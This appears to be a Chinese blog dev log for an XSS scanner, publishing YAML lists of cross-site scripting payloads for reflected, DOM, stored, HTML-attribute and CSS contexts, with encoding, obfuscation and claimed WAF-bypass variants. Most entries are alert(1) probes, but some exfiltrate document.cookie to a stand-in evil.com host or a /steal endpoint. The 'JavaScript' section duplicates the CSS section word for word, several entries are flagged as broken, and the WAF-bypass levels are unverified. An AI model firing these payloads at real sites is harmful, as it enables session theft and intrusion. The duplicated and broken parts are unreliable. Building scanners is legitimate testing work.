HrBeyondXSS开发记录(1)——payload

基础payload
此payload包含常见的基础向量,例如DOM型的常见Sink函数,事件处理器和对象污染等,以及存储型XSS的Cookie注入和存储对象注入
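---
# Reflected / DOM / stored / polyglot / encoding / obfuscation vectors.
# Indentation restored: the published copy had it stripped, so it did not
# parse as YAML. Quoting rule used throughout: double quotes only where a YAML
# escape (\t, \r, \n, \uXXXX) is meant to be decoded into the real character;
# single quotes where a backslash sequence must survive as literal payload text.
reflected:
  basic:
    - "<script>alert(document.domain)</script>"
    - "<img src=x onerror=alert(1)>"
    - "<svg onload=confirm(1)>"
    - "<body onpageshow=prompt(2)>"
    - "<iframe srcdoc='<script>parent.alert(1)</script>'>"
  tag_breaking:
    - "'-alert(1)-'"
    - "';alert(1)//"
    - "</script><script>alert(1)</script>"
    - "><script>alert(1)</script>"
    - "{{constructor.constructor('alert(1)')()}}"
  js_protocols:
    - "javascript:alert(1)"
    - "data:text/html,<script>alert(1)</script>"
    - "vbscript:MsgBox(1)"     # legacy IE-only scheme
    - "livescript:alert`1`"    # legacy Netscape scheme; not expected to fire in current browsers
dom_based:
  # "{{input}}" marks where attacker-controlled data lands. These are sink
  # patterns to look for in page scripts, not payloads to send.
  sink_functions:
    - "eval('{{input}}')"
    - "document.write('<div>{{input}}</div>')"
    - "element.innerHTML = '{{input}}'"
    - "location.href = '{{input}}'"
    - "Function('{{input}}')()"
  event_handlers:
    - "onload=alert(1)"
    - "onmouseover=prompt(2)"
    - "onfocus=console.log(3)"
    - "onanimationstart=confirm(4)"
    - "onpointerenter=print(5)"
  # DOM sources: where attacker-controlled data enters the page.
  source_contamination:
    - "document.cookie"
    - "window.name"
    - "location.hash.substr(1)"
    - "document.referrer"
    - "window.postMessage"   # the actual source is the received message event's data
stored:
  persistence_vectors:
    - "<svg style=display:none onload=setInterval(function(){alert(1)},9999)>"
    - "<meta http-equiv='refresh' content='0; url=javascript:alert(1)'>"   # NOTE(review): current browsers refuse javascript: in meta refresh — verify before relying on it
    - "<audio src=x onerror=alert(1)>"
    - "<video poster=javascript:alert(1)>"   # poster is an image URL; a javascript: value is not executed there
    - "<link rel=stylesheet href='data:text/css,*{color:red};x:expression(alert(1))'>"   # expression() is IE-only
  cookie_injection:
    - "document.cookie='XSS=; expires=Thu, 01 Jan 2970 00:00:00 UTC; path=/;'"
    - "document.cookie='session=malicious<script>alert(1)</script>'"
  storage_objects:
    - "localStorage.setItem('xss','<script>alert(1)</script>')"
    - "sessionStorage.xss = 'javascript:alert(1)'"
    # NOTE(review): the global is `indexedDB` and open() takes (name, version);
    # as written this is not a working call.
    - "IndexedDB.open('xss', {pwn: alert(1)})"
polyglot:
  universal:
    # Single-quoted so every backslash stays literal. The published entry used
    # double quotes, where `\`` is an invalid YAML escape and the line fails to parse.
    - 'jaVasCript:/*-/*`/*\`/*''/*"/**/(alert(1))//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e'
  hybrid:
    - "';alert(1)//\";alert(1)<!--"
    - "<image/src/onerror=alert(1)>"
    - "<input/autofocus/onfocus=alert(1)//%0A>"
    - "<details open ontoggle=alert(1)>"
    - "<select autofocus onfocus=alert(1)>"
  math_obfuscation:
    - "<script>window[`al${(1).toString(30)}ert`](1)</script>"   # (1).toString(30) === "1"
    - "eval(String.fromCharCode(97,108,101,114,116,40,49,41))"   # char codes spell alert(1)
encodings:
  # NOTE(review): as published these two entries contain no entities at all
  # (they read as a plain <script>), so they duplicate reflected.basic. The
  # entity-encoded forms were probably decoded by the page renderer and need
  # to be restored from the original file.
  html_entities:
    - "<script>"
    - "<script>alert(1)</script>"
  # Single-quoted: these must reach the target as the literal text \u003C...;
  # in double quotes YAML would decode them back to plain <script>.
  unicode:
    - '\u003Cscript\u003Ealert(1)\u003C/script\u003E'
    - '\u0061\u006C\u0065\u0072\u0074(1)'
  base64:
    - "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="   # decodes to <script>alert(1)</script>
    # decodes to ${Base64.decode('alert(1)')} — a template-expression probe, not HTML/JS
    - "JHtCYXNlNjQuZGVjb2RlKCdhbGVydCgxKScpfQ=="
  urlencode:
    - "%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
    - "javascript%3Aalert%28document.cookie%29"
obfuscation:
  whitespace:
    # Double quotes on purpose: \u200c, \t and \r are decoded to the real
    # characters, which is the point of these entries.
    - "<script\u200c>alert(1)</script>"
    - "<img\tsrc=x\ronerror=alert(1)>"
  comment_injection:
    - "/*<!--*/alert(1)/*-->*/"
    - "<script><!--\nalert(1)\n//--></script>"
  uncommon_tags:
    - "<noscript><style><a id=</style><img src=x onerror=alert(1)></noscript>"
    - "<template shadowroot=open><script>alert(1)</script></template>"
  nested_encoding:
    # double URL-encoded <script>alert(1)</script>
    - "%25%33%43%73%63%72%69%70%74%25%33%45%61%6C%65%72%74%28%31%29%25%33%43%2F%73%63%72%69%70%74%25%33%45"
    - "JAVASCRIPT:%0A%0Dalert%281%29"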
HTML属性payload
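---
# HTML attribute vectors, keyed by the attribute / context the value lands in.
# Indentation restored: the published copy had it stripped, so it did not
# parse as YAML. Single quotes are used where a \u escape must reach the
# target as literal text; double quotes where a YAML escape should be decoded.
basic_attributes:
  src:
    - "javascript:alert(1)"
    - "javascript:eval(atob('YWxlcnQoMSk='))"   # atob() payload decodes to alert(1)
    - "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="   # decodes to <script>alert(1)</script>
    # a second, identical "javascript:alert(1)" entry was dropped
  href:
    - "javascript:void(document.location='http://evil.com/?c='+document.cookie)"
    - "vbscript:MsgBox(1)"   # legacy IE-only scheme
    - "javascript:alert(1)"
  action:
    - "javascript:alert(1)"
    - "data:text/html,<script>alert(1)</script>"
  data:
    - "data:text/html,<script>alert(1)</script>"
    - "javascript:alert(1);"
event_handlers:
  # Values for an on* attribute; the attribute name itself comes from the scanner.
  generic:
    - "alert(1)"
    - "confirm(document.cookie)"
    - "prompt('XSS')"
  advanced:
    - "eval('al' + 'ert(1)')"
    - "setTimeout('alert(1)',0)"
    - "Function('ale'+'rt(1)')()"
  encoded:
    # NOTE(review): the first entry was published as an unterminated string
    # ("alert(1) with no closing quote), which breaks the whole document; its
    # encoded form is lost and must be recovered from the original file.
    - "alert(1)"
    - '\u0061\u006c\u0065\u0072\u0074(1)'   # single-quoted so the \u escapes stay literal
  framework_specific:
    - "angular.element(document).injector().get('$rootScope').$eval('alert(1)')"   # AngularJS
    - "window.__vue__.alert(1)"   # Vue 2
special_attributes:
  style:
    - "background-image: url(javascript:alert(1))"
    - "expression(alert(1))"   # IE-only
    - "animation: x; @keyframes x { from { background: url(javascript:alert(1)) } }"
  formaction:
    - "javascript:alert(1)"
    - "data:text/html,<script>alert(1)</script>"
  poster:
    - "javascript:alert(1)"
    - "data:text/html,<script>alert(1)</script>"
modern_attributes:
  srcdoc:
    - "<script>alert(1)</script>"
    - "<iframe src=javascript:alert(1)>"
  # NOTE(review): integrity carries a Subresource Integrity hash and is only
  # compared, never executed; this entry cannot fire as written.
  integrity:
    - "'sha256-...' alert(1)"
  onauxclick:
    - "alert(1)"
    - "fetch('/steal?cookie='+document.cookie)"
framework_specific:
  vue:
    "v-bind:href":
      - "javascript:alert(1)"
      - "data:text/html,{{constructor.constructor('alert(1)')()}}"
    "v-on:click":
      - "alert(1)"
      - "_c.escape(_s(${payload}))"
  react:
    dangerouslySetInnerHTML:
      - "{__html: '<img src=x onerror=alert(1)>'}"
    onClick:
      - "alert(1)"
      - "eval('alert(1)')"
  angular:
    # Quoted: a bare [innerHTML] key is parsed by YAML as a flow sequence.
    "[innerHTML]":
      - "<img src=x onerror=alert(1)>"
      - "{{constructor.constructor('alert(1)')()}}"
    "(click)":
      - "alert(1)"
      - "this.constructor.constructor('alert(1)')()"
obfuscation_techniques:
  case_insensitive:
    - "oNerRor=alert(1)"
    - "OnLoAd=confirm(1)"
  whitespace_variants:
    - "onload = alert(1)"
    - "onload/*comment*/=/*...*/alert(1)"
  null_bytes:
    - "onload=alert(1)%00"
    - "java%00script:alert(1)"
  unicode_smuggling:
    # single-quoted so \u0061 is sent as text rather than decoded by YAML
    - 'onload=\u0061lert(1)'
    - 'javascript:\u0061lert(1)'
advanced_bypass:
  template_literals:
    - "onload=${`alert(1)`}"
    - "href=javascript:${`alert`}${1}"
  prototype_pollution:
    - "onload=Object.prototype.exec=alert;1/toString()"
  import_functions:
    - "onload=import('data:text/javascript,alert(1)')"
    - "onload=import(`/evil.com?q=${document.cookie}`)"
polymorphic:
  combo_1: "jAvAsCrIpT:alert(1)/*{{7*7}}*/"
  combo_2: "data:text/html;charset=,<script>alert(1)</script>"
  combo_3: "jav\tascript:alert(1)"   # tab made explicit; the published copy held a raw tab that editors silently drop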
JavaScript
此payload包含常见JavaScript向量,如webAPI,框架特性,浏览器特性。例如存储操作,虚拟DOM,第三方库,WASM交互,Web Components等。(注:下方实际列出的内容与后文“CSS样式表”一节完全相同,上述JavaScript向量并未出现在本文中。)
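---
# NOTE(review): this "JavaScript" listing is byte-for-byte the CSS listing of
# the following section; the JavaScript vectors the section text promises
# (Web API, framework internals, WASM, Web Components) are not present. If the
# two listings are ever concatenated into one file, every top-level key here
# is repeated below and most parsers silently keep only the last value.
# Indentation restored: the published copy had it stripped and did not parse.
basic_injection:
  ie_expression:   # expression() is IE-only
    - "background: expression(alert(1))"
    - "width: /**/expression(alert(document.domain))"
  javascript_url:
    - "background-image: url(javascript:alert(1))"
    - "list-style-image: url('javascript:alert(\"XSS\")')"
  data_uri:
    - "background: url(data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)"   # base64 of <script>alert(1)</script>
    - "cursor: url(data:text/html;charset=utf-8,<script>alert(1)</script>)"
modern_features:
  css_variables:
    - "--malicious: ; background-image: url(javascript:alert(1))"
    - "var(--xss, url(javascript:alert(document.cookie)))"
  keyframes:
    - |
      @keyframes xss {
        from { background: url('x'); }
        to { background: expr/* */ession(alert(1)) }
      }
    - |
      @-webkit-keyframes pwn {
        0% { background: normal; }
        100% { background: javascript:alert(1); }
      }
  houdini:
    # First entry is the JavaScript worklet registration, not CSS; the second is
    # the CSS side that references the worklet.
    - |
      CSS.paintWorklet.addModule('data:text/javascript,alert(1)')
    - "background: paint(xss-worklet)"
encoding_bypass:
  hex_escape:   # CSS hex escapes spelling "javascript:"; "\\" survives YAML as one backslash
    - "background:\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)"
    - "content: \"\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)\""
  unicode_escape:
    - "background:\\6A\\61vascript:alert(1)"
    - "font-family:'\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74';content:alert(1);"
  comment_obfuscation:
    - "background: url(/* */javascript:alert(1))"
    - "color: rgba(255/* */,255/* */,255/* */,expression(alert(1)))"
pseudo_attack:
  hover_trigger:
    - "a:hover { background: url(javascript:alert('onhover')) }"
    - "div:hover::after { content: url(javascript:alert(1)) }"
  focus_stealing:
    - "input:focus { background-image: url('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==') }"
font_attack:
  font_face:
    - |
      @font-face {
        font-family: xss;
        src: url("javascript:alert(1)");
      }
    - "font-family: xss;"
  local_font:
    # breaks out of <style>; the payload is the HTML that follows, not the CSS
    - "font-family: '\\')</style><script>alert(1)</script>';"
media_query:
  conditional:
    - "@media (width: 999999px) { body { background: url(javascript:alert('Media Query XSS')) } }"
  script_media:
    - "@media javascript:alert(1) { }"
advanced_obfuscation:
  layered_encoding:
    # CSS hex escapes spelling url(javascript:alert(1))
    - "background: \\75\\72\\6C\\28\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3A\\61\\6C\\65\\72\\74\\28\\31\\29\\29"
  property_split:
    - "back\\ground: url(javascript:alert(1))"
    - "font-\\66 amily: '\\';} body {background: expression(alert(1))};'"
  illegal_chars:
    - "background:\uFFFDurl(javascript:alert(1))"   # double quotes on purpose: YAML decodes \uFFFD to the real U+FFFD character
    - "color: rgba(1,1,1,alert(1))"
browser_specific:
  ie_conditional:
    - "<!--[if IE]> <style> body { background: expression(alert(1)) } </style> <![endif]-->"
  webkit_exploit:
    - "-webkit-animation: xss 1s; -webkit-keyframes xss { from { background: normal; } to { background: url(javascript:alert(1)) } }"
# NOTE(review): the bypass levels / WAF targets below are unverified claims
# from the post; treat them as hypotheses to test, not as results.
evasion_tags:
  - waf_bypass_level: 3
    target: cloudflare
    techniques:
      - comment_insertion
      - unicode_normalization
  - waf_bypass_level: 5
    target: aws_waf
    techniques:
      - layered_encoding
      - property_split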
CSS样式表
此payload包含常见css向量,如css的特性,伪元素,字体定义,媒体查询等,例如css变量滥用,动画关键帧注入和Houdini API利用等
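---
# CSS-context vectors, grouped by feature. Indentation restored: the published
# copy had it stripped, so it did not parse as YAML. "\\" inside double quotes
# reaches the target as a single backslash, i.e. a CSS escape.
basic_injection:
  ie_expression:   # expression() is IE-only
    - "background: expression(alert(1))"
    - "width: /**/expression(alert(document.domain))"
  javascript_url:
    - "background-image: url(javascript:alert(1))"
    - "list-style-image: url('javascript:alert(\"XSS\")')"
  data_uri:
    - "background: url(data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)"   # base64 of <script>alert(1)</script>
    - "cursor: url(data:text/html;charset=utf-8,<script>alert(1)</script>)"
modern_features:
  css_variables:
    - "--malicious: ; background-image: url(javascript:alert(1))"
    - "var(--xss, url(javascript:alert(document.cookie)))"
  keyframes:
    - |
      @keyframes xss {
        from { background: url('x'); }
        to { background: expr/* */ession(alert(1)) }
      }
    - |
      @-webkit-keyframes pwn {
        0% { background: normal; }
        100% { background: javascript:alert(1); }
      }
  houdini:
    # First entry is the JavaScript worklet registration, not CSS; the second is
    # the CSS side that references the worklet.
    - |
      CSS.paintWorklet.addModule('data:text/javascript,alert(1)')
    - "background: paint(xss-worklet)"
encoding_bypass:
  hex_escape:   # CSS hex escapes spelling "javascript:"
    - "background:\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)"
    - "content: \"\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3Aalert(1)\""
  unicode_escape:
    - "background:\\6A\\61vascript:alert(1)"
    - "font-family:'\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74';content:alert(1);"
  comment_obfuscation:
    - "background: url(/* */javascript:alert(1))"
    - "color: rgba(255/* */,255/* */,255/* */,expression(alert(1)))"
pseudo_attack:
  hover_trigger:
    - "a:hover { background: url(javascript:alert('onhover')) }"
    - "div:hover::after { content: url(javascript:alert(1)) }"
  focus_stealing:
    - "input:focus { background-image: url('data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==') }"
font_attack:
  font_face:
    - |
      @font-face {
        font-family: xss;
        src: url("javascript:alert(1)");
      }
    - "font-family: xss;"
  local_font:
    # breaks out of <style>; the payload is the HTML that follows, not the CSS
    - "font-family: '\\')</style><script>alert(1)</script>';"
media_query:
  conditional:
    - "@media (width: 999999px) { body { background: url(javascript:alert('Media Query XSS')) } }"
  script_media:
    - "@media javascript:alert(1) { }"
advanced_obfuscation:
  layered_encoding:
    # CSS hex escapes spelling url(javascript:alert(1))
    - "background: \\75\\72\\6C\\28\\6A\\61\\76\\61\\73\\63\\72\\69\\70\\74\\3A\\61\\6C\\65\\72\\74\\28\\31\\29\\29"
  property_split:
    - "back\\ground: url(javascript:alert(1))"
    - "font-\\66 amily: '\\';} body {background: expression(alert(1))};'"
  illegal_chars:
    - "background:\uFFFDurl(javascript:alert(1))"   # double quotes on purpose: YAML decodes \uFFFD to the real U+FFFD character
    - "color: rgba(1,1,1,alert(1))"
browser_specific:
  ie_conditional:
    - "<!--[if IE]> <style> body { background: expression(alert(1)) } </style> <![endif]-->"
  webkit_exploit:
    - "-webkit-animation: xss 1s; -webkit-keyframes xss { from { background: normal; } to { background: url(javascript:alert(1)) } }"
# NOTE(review): the bypass levels / WAF targets below are unverified claims
# from the post; treat them as hypotheses to test, not as results.
evasion_tags:
  - waf_bypass_level: 3
    target: cloudflare
    techniques:
      - comment_insertion
      - unicode_normalization
  - waf_bypass_level: 5
    target: aws_waf
    techniques:
      - layered_encoding
      - property_split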
对各种前端框架(例如:React、Vue和Angular等)的针对型payload将不在这里公开,之后开发完成之后可以在Github上查看,此扫描器将在Github上开源,请各位黑客大佬敬请期待
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。